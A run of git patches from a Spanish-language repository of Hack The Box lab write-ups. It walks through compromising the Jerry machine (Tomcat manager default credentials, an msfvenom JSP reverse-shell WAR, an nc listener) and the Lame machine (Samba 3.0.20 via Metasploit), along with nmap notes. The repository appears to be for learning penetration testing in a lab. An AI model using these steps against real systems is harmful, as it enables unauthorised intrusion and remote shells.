3.[ExtractPorts](./Herramientas_y_Scripts/ExtractPorts.html)
4.[mkt](./Herramientas_y_Scripts/mkt.html)
From 918bd9533e0d52c025619828acba411ab7c0c8e4 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 10:53:28 +0200
Subject: [PATCH 0235/1701] Create HTB-Jerry.md
---
Maquinas-HTB/HTB-Jerry.md | 135 ++++++++++++++++++++++++++++++++++++++
1 file changed, 135 insertions(+)
create mode 100644 Maquinas-HTB/HTB-Jerry.md
diff --git a/Maquinas-HTB/HTB-Jerry.md b/Maquinas-HTB/HTB-Jerry.md
new file mode 100644
index 00000000000..c7e20348578
--- /dev/null
+++ b/Maquinas-HTB/HTB-Jerry.md
@@ -0,0 +1,135 @@
+
+
+En primer lugar, nos creamos un directorio con el nombre de la máquina desde el que trabajaremos:
+
+ sudo mkdir Jerry
+
+Ahora, mediante la función [`mkt`](../Herramientas_y_Scripts/mkt.html) que tengo previamente definida en la `.zhshrc` crearemos nuestros directorios de trabajo:
+
+ sudo mkt
+
+Esta función está definida para crearnos cuatro directorios (`nmap`, `content`, `exploits` y `scripts`) desde los cuales poder trabajar a la hora de
+realizar las máquinas de HTB.
+
+Ejecutamos un `ping` y vemos como nos reporta un ttl=127, por tanto, ya sabemos que estamos frente una máquina Windows.
+
+ ping -c 1 10.10.10.95
+
+
+
+Ahora vamos a ver mediante `whatweb` que más podemos ver:
+
+ whatweb 10.10.10.95
+
+
+
+Nos reporta un erro al tratar de acceder. Port tanto vamos a realizar mediante [`nmap`](../Herramientas_y_Scripts/Nmap.html)
+una serie de escaneos para ver que puertos se encuentran abiertos, primero realizare un escaneo básico:
+
+ nmap -p- --open -T5 -v -n 10.10.10.95 -oG allPorts
+
+`-oG` : Exportar los resultados en formato grepeable.
+
+`allPorts` : Nombre del archivo. Si no existe lo creará.
+
+De esta manera podremos revisar los puertos que estaban abiertos en cualquier momento.
+
+
+
+
+
+Como podemos ver, nos reporta que el puerto 8080 esta abierto, vamos a realizar un segundo escaneo especificando
+que quereros utilzar la variable `--script http-enum` en el puerto 8080 y guardaremos los resultados en el archivo
+`targetenum`.
+
+ sudo nmap --script http-enum -p8080 10.10.10.95 -oN targetenum
+
+
+
+
+
+Vemos que en el puerto `8080` corre un servicio `http`, por tanto vamos a intentar acceder mediante el navegador de Firefox.
+
+
+
+Vemos que al intentar acceder al dominio `http://10.10.10.95` la página no termina de cargar, pero tampoco reporta ningún error. Por tanto lo siguiente que
+probaremos sera especificar el puerto en el que corre el servicio, por tanto intentamos acceder al dominio `http://10.10.10.95:8080`.
+
+
+
+
+
+Genial ya nos carga la página, vemos que se trata de la página oficial de un programa llamado `Tomcat`. Lo siguiente que vamos a probar, es tratar de
+acceder al directorio `./manager/html`.
+
+
+
+
+
+Nos muestra una ventana de registro, como se trata de una máquina fácil, podemos probar con combinaciones básicas para ver si conseeguimos ingresar
+de manera sencilla.
+
+
+
+Tras probar algunas combinaciones vemos que utilizando el usuario `admin` y la contraseña `admin` nos reporta este mensaje con un error de servicio 403.
+
+
+
+Vemos como nos indica un ejemplo, donde nos muestra una credenciales que se han utilizado para motrar el ejemplo.
+
+
+
+Tratamos de acceder al panel anterior mediante estas credenciales a ver si nos permite registrarnos como el usuario `tomcat` y utilizando la contaseña
+`s3cret`.
+
+
+
+
+
+
+
+Las credenciales funcionan y nos lleva hasta una página que parece gestionar aplicaciones.
+
+Tras revisar la página vemos que nos permite subir arhcivos, así que vamos a tratar de buscar alguna herramienta que nos perminta crear una
+shell inversa desde la cual poder interactuar con la máquina.
+
+Mediante `msfvenom` podemos tratar de comprobar una gran cantidad de herramientas:
+
+ msfvenom -l payloads
+
+
+
+
+
+Vamoa a utilizar la herramienta `jsp_shell_reverse_tcp`. Esta herramienta, especificandole nuestro host de escucha y el puerto mediante el siguiente
+comando, nos creará un archivo en formato `.war` capaz de crear una shell inversa desde la máquina víctima.
+
+ msfvenom -p- java/sjp_shell_reverse_tcp LHOST=10.10.10.14.29 LPORT=8080 -f war -o shell.war
+
+Una vez creado nuestro archivo `shell.war` vamos a subirlo a la máquina victima, pero antes, debemos mover nuestro archivo
+al directorio `Descargas/Downloads`:
+
+
+
+Ahora mediante el apartado de la página llamado `Archivo WAR a desplegar` subimos nuestro archivo `shel.war`.
+
+
+
+
+
+
+
+
+
+Recargamos la página y vemos como aparece nuestro archivo. El siguiente paso será ponerno en escucha por el puerto `8080` mediante `nc`:
+
+
+
+
+
+
+
+
+
+
+
From 86ec6ce412d220ab391380eddc4fc46d9193a8b1 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 12:03:06 +0200
Subject: [PATCH 0236/1701] Update HTB-Jerry.md
---
Maquinas-HTB/HTB-Jerry.md | 38 +++++++++++++++++++++++++++++++++++---
1 file changed, 35 insertions(+), 3 deletions(-)
diff --git a/Maquinas-HTB/HTB-Jerry.md b/Maquinas-HTB/HTB-Jerry.md
index c7e20348578..762851f777b 100644
--- a/Maquinas-HTB/HTB-Jerry.md
+++ b/Maquinas-HTB/HTB-Jerry.md
@@ -104,14 +104,18 @@ Mediante `msfvenom` podemos tratar de comprobar una gran cantidad de herramienta
Vamoa a utilizar la herramienta `jsp_shell_reverse_tcp`. Esta herramienta, especificandole nuestro host de escucha y el puerto mediante el siguiente
comando, nos creará un archivo en formato `.war` capaz de crear una shell inversa desde la máquina víctima.
- msfvenom -p- java/sjp_shell_reverse_tcp LHOST=10.10.10.14.29 LPORT=8080 -f war -o shell.war
+
+
+ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.14.29 LPORT=8080 -f war -o shell.war
+
+
Una vez creado nuestro archivo `shell.war` vamos a subirlo a la máquina victima, pero antes, debemos mover nuestro archivo
al directorio `Descargas/Downloads`:

-Ahora mediante el apartado de la página llamado `Archivo WAR a desplegar` subimos nuestro archivo `shel.war`.
+Ahora mediante el apartado de la página llamado `Archivo WAR a desplegar` subimos nuestro archivo `shell.war`.

@@ -121,13 +125,41 @@ Ahora mediante el apartado de la página llamado `Archivo WAR a desplegar` subim

-Recargamos la página y vemos como aparece nuestro archivo. El siguiente paso será ponerno en escucha por el puerto `8080` mediante `nc`:
+Recargamos la página y vemos como aparece nuestro archivo. El siguiente paso será ponerno en escucha por el puerto `8080` mediante `nc` como se
+trata de un sistema windows utilizaremos `rlwarp`:
+
+ rlwrap nc -lvnp 8080
+
+
+
+
+
+
+Ahora para ejecutar el archivo, simplemente nos vamos a la página y lo pulsamos.
+
+
+
+
+Vemos como la shell se nos despliega en la terminal que tenemos en escucha con Netcat.
+
+
+
+Está maquina ya esta básicamente terminada ya que las dos flags se encuentran en el mismo archivo, el cual se encuentra en el directorio
+`C:\Users\Administrator\Desktop\flags`:
+
+ cd /Users/Administrator/Desktop/flags
+
+Vemos como dentro del directorio `flags` se encuenta el archivo `2 for the price at 1.txt`
+
+Y finalmente, mediante `type` podemos visualizar el contenido:
+
+
From 2c1c497fd3a68d2802795d04d8c9d727ea1926db Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 12:08:46 +0200
Subject: [PATCH 0237/1701] Update HTB-Jerry.md
---
Maquinas-HTB/HTB-Jerry.md | 39 +++++++++++++++++++--------------------
1 file changed, 19 insertions(+), 20 deletions(-)
diff --git a/Maquinas-HTB/HTB-Jerry.md b/Maquinas-HTB/HTB-Jerry.md
index 762851f777b..a0af06e4255 100644
--- a/Maquinas-HTB/HTB-Jerry.md
+++ b/Maquinas-HTB/HTB-Jerry.md
@@ -23,8 +23,8 @@ Ahora vamos a ver mediante `whatweb` que más podemos ver:

-Nos reporta un erro al tratar de acceder. Port tanto vamos a realizar mediante [`nmap`](../Herramientas_y_Scripts/Nmap.html)
-una serie de escaneos para ver que puertos se encuentran abiertos, primero realizare un escaneo básico:
+Nos reporta un erro al tratar de acceder. Por tanto, vamos a realizar mediante [`nmap`](../Herramientas_y_Scripts/Nmap.html)
+una serie de escaneos para ver que puertos se encuentran abiertos, primero realizaré un escaneo básico:
nmap -p- --open -T5 -v -n 10.10.10.95 -oG allPorts
@@ -38,8 +38,8 @@ De esta manera podremos revisar los puertos que estaban abiertos en cualquier mo

-Como podemos ver, nos reporta que el puerto 8080 esta abierto, vamos a realizar un segundo escaneo especificando
-que quereros utilzar la variable `--script http-enum` en el puerto 8080 y guardaremos los resultados en el archivo
+Como podemos ver, nos reporta que el puerto 8080 está abierto, vamos a proceder a un segundo escaneo especificando
+que quereros utilizar la variable `--script http-enum` en el puerto 8080 y guardaremos los resultados en el archivo
`targetenum`.
sudo nmap --script http-enum -p8080 10.10.10.95 -oN targetenum
@@ -48,12 +48,12 @@ que quereros utilzar la variable `--script http-enum` en el puerto 8080 y guarda

-Vemos que en el puerto `8080` corre un servicio `http`, por tanto vamos a intentar acceder mediante el navegador de Firefox.
+Vemos que en el puerto `8080` corre un servicio `http`, por tanto, vamos a intentar acceder mediante el navegador de Firefox.

-Vemos que al intentar acceder al dominio `http://10.10.10.95` la página no termina de cargar, pero tampoco reporta ningún error. Por tanto lo siguiente que
-probaremos sera especificar el puerto en el que corre el servicio, por tanto intentamos acceder al dominio `http://10.10.10.95:8080`.
+Vemos que al intentar acceder al dominio `http://10.10.10.95` la página no termina de cargar, pero tampoco reporta ningún error. Por tanto, lo siguiente que
+probaremos será especificar el puerto en el que corre el servicio, por tanto, intentamos acceder al dominio `http://10.10.10.95:8080`.

@@ -66,7 +66,7 @@ acceder al directorio `./manager/html`.

-Nos muestra una ventana de registro, como se trata de una máquina fácil, podemos probar con combinaciones básicas para ver si conseeguimos ingresar
+Nos muestra una ventana de registro, como se trata de una máquina fácil, podemos probar con combinaciones básicas para ver si conseguimos ingresar
de manera sencilla.

@@ -75,11 +75,11 @@ Tras probar algunas combinaciones vemos que utilizando el usuario `admin` y la c

-Vemos como nos indica un ejemplo, donde nos muestra una credenciales que se han utilizado para motrar el ejemplo.
+Vemos como nos indica un ejemplo, donde nos muestra unas credenciales que se han usado para mostrar el ejemplo.

-Tratamos de acceder al panel anterior mediante estas credenciales a ver si nos permite registrarnos como el usuario `tomcat` y utilizando la contaseña
+Tratamos de acceder al panel anterior mediante estas credenciales a ver si nos permite registrarnos como el usuario `tomcat` y empleando la contraseña
`s3cret`.

@@ -90,7 +90,7 @@ Tratamos de acceder al panel anterior mediante estas credenciales a ver si nos p
Las credenciales funcionan y nos lleva hasta una página que parece gestionar aplicaciones.
-Tras revisar la página vemos que nos permite subir arhcivos, así que vamos a tratar de buscar alguna herramienta que nos perminta crear una
+Tras revisar la página vemos que nos permite subir archivos, así que vamos a tratar de buscar alguna herramienta que nos permita crear una
shell inversa desde la cual poder interactuar con la máquina.
Mediante `msfvenom` podemos tratar de comprobar una gran cantidad de herramientas:
@@ -101,7 +101,7 @@ Mediante `msfvenom` podemos tratar de comprobar una gran cantidad de herramienta

-Vamoa a utilizar la herramienta `jsp_shell_reverse_tcp`. Esta herramienta, especificandole nuestro host de escucha y el puerto mediante el siguiente
+Vamos a emplear la herramienta `jsp_shell_reverse_tcp`. Esta herramienta, especificándole nuestro host de escucha y el puerto mediante el siguiente
comando, nos creará un archivo en formato `.war` capaz de crear una shell inversa desde la máquina víctima.

@@ -110,12 +110,12 @@ comando, nos creará un archivo en formato `.war` capaz de crear una shell inver

-Una vez creado nuestro archivo `shell.war` vamos a subirlo a la máquina victima, pero antes, debemos mover nuestro archivo
+Una vez creado nuestro archivo `shell.war` vamos a subirlo a la máquina víctima, pero antes, debemos mover nuestro archivo
al directorio `Descargas/Downloads`:

-Ahora mediante el apartado de la página llamado `Archivo WAR a desplegar` subimos nuestro archivo `shell.war`.
+Ahora, mediante el apartado de la página llamado `Archivo WAR a desplegar` subimos nuestro archivo `shell.war`.

@@ -125,8 +125,8 @@ Ahora mediante el apartado de la página llamado `Archivo WAR a desplegar` subim

-Recargamos la página y vemos como aparece nuestro archivo. El siguiente paso será ponerno en escucha por el puerto `8080` mediante `nc` como se
-trata de un sistema windows utilizaremos `rlwarp`:
+Recargamos la página y vemos como aparece nuestro archivo. El siguiente paso será ponerlo en escucha por el puerto `8080` mediante `nc` como se
+trata de un sistema Windows utilizaremos `rlwarp`:
rlwrap nc -lvnp 8080
@@ -136,7 +136,7 @@ trata de un sistema windows utilizaremos `rlwarp`:

-Ahora para ejecutar el archivo, simplemente nos vamos a la página y lo pulsamos.
+Ahora, para ejecutar el archivo, simplemente nos vamos a la página y lo pulsamos.

@@ -145,12 +145,12 @@ Vemos como la shell se nos despliega en la terminal que tenemos en escucha con N

-Está maquina ya esta básicamente terminada ya que las dos flags se encuentran en el mismo archivo, el cual se encuentra en el directorio
+Está máquina ya está básicamente terminada, ya que las dos flags se encuentran en el mismo archivo, el cual se encuentra en el directorio
`C:\Users\Administrator\Desktop\flags`:
cd /Users/Administrator/Desktop/flags
-Vemos como dentro del directorio `flags` se encuenta el archivo `2 for the price at 1.txt`
+Vemos como dentro del directorio `flags` se encuentra el archivo `2 for the price at 1.txt`

@@ -164,4 +164,3 @@ Y finalmente, mediante `type` podemos visualizar el contenido:
-
From 9248eef3607fae62bf48941c351875dfe18e98f6 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 12:10:00 +0200
Subject: [PATCH 0238/1701] Update index.md
---
index.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/index.md b/index.md
index 32b1a59fb2f..9646e112dd3 100644
--- a/index.md
+++ b/index.md
@@ -4,6 +4,8 @@
[HTB-SwagShop](./Maquinas-HTB/HTB-SwagShop.html)
+[HTB-Jerry](./Maquinas-HTB/HTB-Jerry.html)
+
## Starting Points
[HTB-Oopsie](./Starting Point/HTB-Oopsie.html)
From 125403d748e537fce9eb3979df0a538148002329 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 12:16:12 +0200
Subject: [PATCH 0239/1701] Update HTB-Jerry.md
---
Maquinas-HTB/HTB-Jerry.md | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/Maquinas-HTB/HTB-Jerry.md b/Maquinas-HTB/HTB-Jerry.md
index a0af06e4255..d46a16d818c 100644
--- a/Maquinas-HTB/HTB-Jerry.md
+++ b/Maquinas-HTB/HTB-Jerry.md
@@ -1,5 +1,7 @@

+# HTB-Jerry
+
En primer lugar, nos creamos un directorio con el nombre de la máquina desde el que trabajaremos:
sudo mkdir Jerry
@@ -11,6 +13,8 @@ Ahora, mediante la función [`mkt`](../Herramientas_y_Scripts/mkt.html) que teng
Esta función está definida para crearnos cuatro directorios (`nmap`, `content`, `exploits` y `scripts`) desde los cuales poder trabajar a la hora de
realizar las máquinas de HTB.
+## Fase de Reconocimiento:
+
Ejecutamos un `ping` y vemos como nos reporta un ttl=127, por tanto, ya sabemos que estamos frente una máquina Windows.
ping -c 1 10.10.10.95
@@ -59,6 +63,8 @@ probaremos será especificar el puerto en el que corre el servicio, por tanto, i

+## Fase de Inrusión:
+
Genial ya nos carga la página, vemos que se trata de la página oficial de un programa llamado `Tomcat`. Lo siguiente que vamos a probar, es tratar de
acceder al directorio `./manager/html`.
@@ -93,6 +99,8 @@ Las credenciales funcionan y nos lleva hasta una página que parece gestionar ap
Tras revisar la página vemos que nos permite subir archivos, así que vamos a tratar de buscar alguna herramienta que nos permita crear una
shell inversa desde la cual poder interactuar con la máquina.
+## Creación de una Reverse Shell mediante MsfVenom:
+
Mediante `msfvenom` podemos tratar de comprobar una gran cantidad de herramientas:
msfvenom -l payloads
From 491cb7dd5334a49723e6a4494eae83c907e72e70 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 13:57:34 +0200
Subject: [PATCH 0240/1701] Create Lame.md
---
Maquinas-HTB/Lame.md | 154 +++++++++++++++++++++++++++++++++++++++++++
1 file changed, 154 insertions(+)
create mode 100644 Maquinas-HTB/Lame.md
diff --git a/Maquinas-HTB/Lame.md b/Maquinas-HTB/Lame.md
new file mode 100644
index 00000000000..b6391fa43b2
--- /dev/null
+++ b/Maquinas-HTB/Lame.md
@@ -0,0 +1,154 @@
+# HTB-Lame
+
+
+## Fase de Reconocimiento
+
+En primer lugar, debemos asegurar que estamos conectados a la víctima y tratar de recopilar la máxima información posible.
+
+ Para verificar la conexión y tener una primera toma de contacto utilizaremos el comando `ping`.
+
+ ping 10.10.10.3
+
+ Mediante este comando podemos obtener la siguiente información:
+
+ - Verificar la conexión.
+ - La latencia. Podemos observar el tiempo de recorrido
+ de un paquete.
+ - Podemos obtener la Ip de un dominio.
+ - Determinar si estamos frente a un SO Linux o Windows:
+ Windows ttl = 128
+ Linux ttl = 64
+
+ nmap -p- --open -T5 -v -n 10.10.10.3 -oG allPorts
+
+
+
+`-p-` : Escanea todo el rango de puertos.
+
+`--open` : Solo nos mostrará puertos con el estatus abierto.
+
+`-T5` : Controla el tiempo y el rendimiento del escaneo donde 1 es el más lento y 5 el más rápido.
+
+`-v` : Verbose. Recopila los puertos abiertos por TCP y los reporta por consola.
+
+`-n` : Anula la resolución DNS.
+
+`-oG` : Exportar los resultados en formato grepeable.
+
+`allPorts` : Nombre del archivo. Si no existe lo creará.
+
+ De esta manera podremos revisar los puertos que estaban abiertos en cualquier momento.
+
+
+
+ Tras conocer los puertos TCP abiertos, realizaremos un segundo escaneo enfocado en los puertos abiertos para ver la información que nos reportan y
+ exportarlo en formato nmap al archivo 'targed'.
+
+ nmap -sC -sV -n -v -p21,,22,139,445,3632 -oN target
+
+
+
+`-sC` : Lanza scrips básicos de reconocimiento.
+
+`-sV` : Localiza la versión y servicio de los puertos definidos.
+
+`-p` : Puertos a escanear.
+
+`-oN` : Reporta los resultados en formato nmap al archivo `target`.
+
+
+
+
+Vemos que en el puerto 21/tcp corre un servicio ftp con la versión `vsftpd 2.3.4`. Vamos a tratar de buscar alguna vulnerabilidad para está versión
+en concreto. Para realizar la busqueda utilizaremos la herramienta `searchsploit`. En caso de no tenerlo lo instalamos:
+
+ sudo apt install searchsploit
+
+Luego lo ejecutamos y le especificamos la versión para que nos busque el `exploit` adecudo:
+
+ searchsploit vsftpd
+
+
+
+Vemos como para la versión 2.3.4 existe una herramienta llamada `Backdoor Command Execution (Metasploit)` alojado en el PATH `unix/remote/17491.rb`.
+Veamos el código a ver que información utiliza para vulnerar está versio:
+
+ searchsploit -x unix/remote/17491.rb
+
+`-x` : Para examinar un archivo.
+
+
+
+
+
+Esta herramienta por lo que parece, utiliza una serie de cadenas en el usuario para tratar de ganar acceso por el puerto 6200. Yo lo he intentado
+manualmente y mediante `Metasploit` y no he podido acceder mediante está herramienta.
+
+
+
+Al ver que esto no funcionaba, busque otro vector de ataque y vemos que por los puertos 139 y 445 corre un servicio `Samba`.
+
+
+
+Vemos tambien que en el puerto 445 nos indiaca la versión `3.0.20`, así que buscamos sobre este servicio:
+
+ searchsploit samba 3.0.20
+
+
+
+## Metasploit
+
+Vamos a tratar de acceder mediante `Metasploit` utilizando la herramienta reportada anteriormente. En primer lugar ejecutamos `metasploit`:
+
+ msfconsole
+
+Buscamos la versión de Samba para asegurarnos que tenemos la herramienta y ver donde se aloja:
+
+ search samba 3.0.20
+
+
+
+Ahora mediante la variable `options` podemos ver los campos que tenemos que rellenar para poder realizar el ataque.
+
+
+
+Para cambiar los campos utilizamos la variable `set` y el campo que deseamos cambiar. Primero introduciremos el localhost `LHOST`, es nuestra IP o en este caso
+la IP de la VPN de Hack the Box:
+
+
+
+Ahora especificamos el puero de escucha, yo voy a utilizar el `8080`:
+
+
+
+Ahora especificaremos de la misma manera el remote host `RHSOT` en este caso la Ip de la máquina:
+
+
+
+Y finalmente el puerto abierto `RPORT` por el que corre el servicio Samba, en este caso el puerto `139`, este campo se suele
+rellenar de forma autimática.
+
+
+
+Y finalmente ejecutamos Metasploit:
+
+ exploit
+
+
+
+Vemos como nos crea la shell y que a de más estamos registrados como `root`.
+
+Finalmente como estamos registrados como `root` podemos buscar las flags sin ningún problema. Vemos que la flag del usuario la
+podemos encontrar en el directorio `/home/makis/user.txt`.
+
+
+
+Y que la flag del usuario `root` lo podemos encontrar en el directorio `/root/root.txt`.
+
+
+
+
+
+
+
+
From 0af49f456f9a211dcf9ff44939bbf70ebe33bd68 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 13:57:56 +0200
Subject: [PATCH 0241/1701] Rename Lame.md to HTB-Lame.md
---
Maquinas-HTB/{Lame.md => HTB-Lame.md} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename Maquinas-HTB/{Lame.md => HTB-Lame.md} (100%)
diff --git a/Maquinas-HTB/Lame.md b/Maquinas-HTB/HTB-Lame.md
similarity index 100%
rename from Maquinas-HTB/Lame.md
rename to Maquinas-HTB/HTB-Lame.md
From 1db600d250ae9f3258af2401e3c6326cd0067fe2 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 13:58:39 +0200
Subject: [PATCH 0242/1701] Update index.md
---
index.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/index.md b/index.md
index 9646e112dd3..1cc75010f6a 100644
--- a/index.md
+++ b/index.md
@@ -6,6 +6,9 @@
[HTB-Jerry](./Maquinas-HTB/HTB-Jerry.html)
+[HTB-Lame](./Maquinas-HTB/HTB-Lame.html)
+
+
## Starting Points
[HTB-Oopsie](./Starting Point/HTB-Oopsie.html)
From f94125e0ba98a1476ae9276ce1a79978d021da97 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 14:00:04 +0200
Subject: [PATCH 0243/1701] Update HTB-Lame.md
---
Maquinas-HTB/HTB-Lame.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/Maquinas-HTB/HTB-Lame.md b/Maquinas-HTB/HTB-Lame.md
index b6391fa43b2..276a6f0b19e 100644
--- a/Maquinas-HTB/HTB-Lame.md
+++ b/Maquinas-HTB/HTB-Lame.md
@@ -1,3 +1,6 @@
+
+
+
# HTB-Lame
From b9e67910e82cc3f729c37652fda420d1a848df60 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 14:03:14 +0200
Subject: [PATCH 0244/1701] Update HTB-Lame.md
---
Maquinas-HTB/HTB-Lame.md | 26 +++++++++++++-------------
1 file changed, 13 insertions(+), 13 deletions(-)
diff --git a/Maquinas-HTB/HTB-Lame.md b/Maquinas-HTB/HTB-Lame.md
index 276a6f0b19e..488baa8ffe3 100644
--- a/Maquinas-HTB/HTB-Lame.md
+++ b/Maquinas-HTB/HTB-Lame.md
@@ -30,7 +30,7 @@ En primer lugar, debemos asegurar que estamos conectados a la víctima y tratar
`--open` : Solo nos mostrará puertos con el estatus abierto.
-`-T5` : Controla el tiempo y el rendimiento del escaneo donde 1 es el más lento y 5 el más rápido.
+`-T5` : Controla el tiempo y el rendimiento del escaneo donde 1 es el más lento y 5 el más rápido.
`-v` : Verbose. Recopila los puertos abiertos por TCP y los reporta por consola.
@@ -62,8 +62,8 @@ En primer lugar, debemos asegurar que estamos conectados a la víctima y tratar

-Vemos que en el puerto 21/tcp corre un servicio ftp con la versión `vsftpd 2.3.4`. Vamos a tratar de buscar alguna vulnerabilidad para está versión
-en concreto. Para realizar la busqueda utilizaremos la herramienta `searchsploit`. En caso de no tenerlo lo instalamos:
+Vemos que en el puerto 21/tcp corre un servicio ftp con la versión `vsftpd 2.3.4`. Vamos a tratar de buscar alguna vulnerabilidad para esta versión
+en concreto. Para realizar la búsqueda utilizaremos la herramienta `searchsploit`. En caso de no tenerlo lo instalamos:
sudo apt install searchsploit
@@ -74,7 +74,7 @@ Luego lo ejecutamos y le especificamos la versión para que nos busque el `explo

Vemos como para la versión 2.3.4 existe una herramienta llamada `Backdoor Command Execution (Metasploit)` alojado en el PATH `unix/remote/17491.rb`.
-Veamos el código a ver que información utiliza para vulnerar está versio:
+Veamos el código a ver que información utiliza para vulnerar está versión:
searchsploit -x unix/remote/17491.rb
@@ -84,8 +84,8 @@ Veamos el código a ver que información utiliza para vulnerar está versio:

-Esta herramienta por lo que parece, utiliza una serie de cadenas en el usuario para tratar de ganar acceso por el puerto 6200. Yo lo he intentado
-manualmente y mediante `Metasploit` y no he podido acceder mediante está herramienta.
+Esta herramienta, por lo que parece, usa una serie de cadenas en el usuario para tratar de ganar acceso por el puerto 6200. Yo lo he intentado
+manualmente y mediante `Metasploit` y no he podido acceder mediante esta herramienta.

@@ -93,7 +93,7 @@ Al ver que esto no funcionaba, busque otro vector de ataque y vemos que por los

-Vemos tambien que en el puerto 445 nos indiaca la versión `3.0.20`, así que buscamos sobre este servicio:
+Vemos también que en el puerto 445 nos indica la versión `3.0.20`, así que buscamos sobre este servicio:
searchsploit samba 3.0.20
@@ -101,7 +101,7 @@ Vemos tambien que en el puerto 445 nos indiaca la versión `3.0.20`, así que bu
## Metasploit
-Vamos a tratar de acceder mediante `Metasploit` utilizando la herramienta reportada anteriormente. En primer lugar ejecutamos `metasploit`:
+Vamos a tratar de acceder mediante `Metasploit` empleando la herramienta reportada anteriormente. En primer lugar, ejecutamos `Metasploit`:
msfconsole
@@ -111,16 +111,16 @@ Buscamos la versión de Samba para asegurarnos que tenemos la herramienta y ver

-Ahora mediante la variable `options` podemos ver los campos que tenemos que rellenar para poder realizar el ataque.
+Ahora, mediante la variable `options` podemos ver los campos que tenemos que rellenar para poder realizar el ataque.

-Para cambiar los campos utilizamos la variable `set` y el campo que deseamos cambiar. Primero introduciremos el localhost `LHOST`, es nuestra IP o en este caso
+Para cambiar los campos empleamos la variable `set` y el campo que deseamos cambiar. Primero introduciremos el localhost `LHOST`, es nuestra IP o en este caso
la IP de la VPN de Hack the Box:

-Ahora especificamos el puero de escucha, yo voy a utilizar el `8080`:
+Ahora especificamos el puerto de escucha, yo voy a utilizar el `8080`:

@@ -129,7 +129,7 @@ Ahora especificaremos de la misma manera el remote host `RHSOT` en este caso la

Y finalmente el puerto abierto `RPORT` por el que corre el servicio Samba, en este caso el puerto `139`, este campo se suele
-rellenar de forma autimática.
+rellenar de forma automática.

@@ -141,7 +141,7 @@ Y finalmente ejecutamos Metasploit:
Vemos como nos crea la shell y que a de más estamos registrados como `root`.
-Finalmente como estamos registrados como `root` podemos buscar las flags sin ningún problema. Vemos que la flag del usuario la
+Finalmente, como estamos registrados como `root` podemos buscar las flags sin ningún problema. Vemos que la flag del usuario la
podemos encontrar en el directorio `/home/makis/user.txt`.

From f6f905bf13014d41905684f27127a410de5cb887 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 23:15:35 +0200
Subject: [PATCH 0245/1701] Update Nmap.md
---
Herramientas_y_Scripts/Nmap.md | 21 +++++++++++++++++++++
1 file changed, 21 insertions(+)
diff --git a/Herramientas_y_Scripts/Nmap.md b/Herramientas_y_Scripts/Nmap.md
index 6158b10f318..2bc7735e1a4 100644
--- a/Herramientas_y_Scripts/Nmap.md
+++ b/Herramientas_y_Scripts/Nmap.md
@@ -43,3 +43,24 @@ De esta manera podremos revisar los puertos que estaban abiertos en cualquier mo
`-oN` : Reporta los resultados en formato nmap al archivo `targed`.
+### Escaneo Rápido Completo:
+
+ nmap -p- --open -sS --min-rate 5800 -vvv -n -Pn [Ip Vícitma] -oG allPorts
+
+`-p-` : Escanea todo el rango de puertos.
+
+`--open` : Solo nos mostrará puertos con el estatus abierto.
+
+`-sS` : El escaneo SYN realizar rápidamente, escaneando miles de puertos por segundo en una red rápida que no se ve obstaculizada por firewalls intrusivos.
+
+`--min-rate` : Controla directamente la tasa de escaneo. Nmap intentará mantener la velocidad de envío en 5000 paquetes por segundo o más.
+
+`-v` : Verbose. Recopila los puertos abiertos por TCP y los reporta por consola.
+
+`-n` : Anula la resolución DNS.
+
+
+
+
+
+
From 3ab6ca16936c735b1baa47d7982700772474e2cf Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 23:17:22 +0200
Subject: [PATCH 0246/1701] Update Nmap.md
---
Herramientas_y_Scripts/Nmap.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Herramientas_y_Scripts/Nmap.md b/Herramientas_y_Scripts/Nmap.md
index 2bc7735e1a4..bb4e4ded6a6 100644
--- a/Herramientas_y_Scripts/Nmap.md
+++ b/Herramientas_y_Scripts/Nmap.md
@@ -55,8 +55,8 @@ De esta manera podremos revisar los puertos que estaban abiertos en cualquier mo
`--min-rate` : Controla directamente la tasa de escaneo. Nmap intentará mantener la velocidad de envío en 5000 paquetes por segundo o más.
-`-v` : Verbose. Recopila los puertos abiertos por TCP y los reporta por consola.
-
+`-vvv` : Triple verbose. Recopila los puertos abiertos por TCP y los reporta por consola. Cuanto más verbose más información reporta mientras se realiza el escaneneo.
+
`-n` : Anula la resolución DNS.
From e1cd9532856b22d5b6efa7034e970b5df17db679 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 00:12:59 +0200
Subject: [PATCH 0247/1701] Update Bluetoothctl.md
---
"Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
